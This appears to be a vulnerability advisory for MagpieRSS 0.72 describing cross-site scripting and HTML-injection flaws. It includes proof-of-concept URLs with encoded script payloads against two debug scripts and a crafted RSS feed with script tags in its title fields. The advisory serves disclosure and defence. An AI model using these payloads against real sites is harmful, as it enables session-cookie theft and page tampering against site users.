source: https://www.securityfocus.com/bid/34891/info MagpieRSS is prone to multiple cross-site scripting issues and an HTML-injection issue because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. MagpieRSS 0.72 is vulnerable; other versions may also be affected. http://www.example.com/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script http://www.example.com/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script Justin.MadIrish.net <script>alert('xss title');</script>- Justin's Personal Homepage http://www.example.com Close personal friends with Evil Eve. en Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script> http://www.example.com/node/343 foobar Wed, 04 Mar 2009 13:42:09 +0000 justin 343 at http://www.example.com